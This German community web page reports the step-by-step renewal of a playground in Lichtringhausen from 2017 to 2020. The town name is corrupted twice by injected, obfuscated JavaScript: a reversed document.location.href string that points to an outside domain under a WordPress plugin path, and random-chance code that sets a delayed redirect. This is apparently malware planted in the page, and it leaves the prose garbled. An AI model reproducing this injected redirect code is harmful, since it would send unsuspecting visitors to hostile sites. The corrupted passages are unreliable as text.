Skip to content Skip to main navigation Skip to footer

Der Spielplatz wird erneuert!

Was lange währt wird endlich gut!

Bereits im August 2017 fand dazu auf Einladung der Gruppe „WIR“ ein erstes Gespräch vor Ort mit Vertretern der Stadtverwaltung Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn statt. Eine umfassende Erneuerung konnte dabei allerdings nicht erreicht werden. Es blieb zunächst bei kleineren Maßnahmen wie der Kiesaufschüttung bei der Schaukelanlage, der Aufhängung eines neuen Schaukelsitzes für Kleinkinder, der Aufstellung einer weiteren Kleinkindwippe und der Erneuerung der Sitzgruppe.

Bei einem weiteren Termin Mitte 2018 mit Mitarbeitern des Baubetriebshofes wurde dann aber festgestellt, dass das Holzgerüst der Schaukelanlage erste Anzeichen von Fäulnis aufwies. Daraus ergab sich Handlungsbedarf. Mit Unterstützung durch die politischen Fraktionen von CDU und SPD wurde die Erneuerung dann in die Haushaltsberatungen für 2019 aufgenommen und letztendlich ein entsprechender Betrag in den Haushalt 2019 eingestellt.

Im Laufe des Jahres wurden dann die Vorschläge des Baubetriebshofes mit Vertretern der Gruppe „WIR“, Vertretern der Politik und interessierten Eltern und Kindern vor Ort beraten. Wichtig war dabei für alle Beteiligten bei der Auswahl der Spielgeräte, dass der Spielplatz sowohl für Kleinkinder als auch für Schulkinder attraktiv sein sollte.

Nachdem die entsprechenden Geräte beschafft waren, konnte im November der Baubetriebshof mit den Arbeiten beginnen. Durch umfangreiche Erdarbeiten wurde zunächst eine Änderung des Geländeprofils vorgenommen mit dem Ziel, mehr ebene Fläche für die Aufstellung von Geräten zu bekommen. Auf dieser neuen Fläche werden zur Zeit ein neues Kletter- und Schaukelgerät sowie weitere vorhandene und neue Spielgeräte platziert. Mit der Begrünung der Anlage im Frühjahr 2020 wird dann die Maßnahme abgeschlossen. Die Gruppe „WIR“ wird dann wieder die Pflege des Platzes übernehmen.

Kinder und Eltern, aber auch alle Lichtringhauser bedanken sich bei der Stadt Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn für die Bereitstellung der Mittel und bei den Mitarbeitern des Baubetriebshofes für die Durchführung der Arbeiten.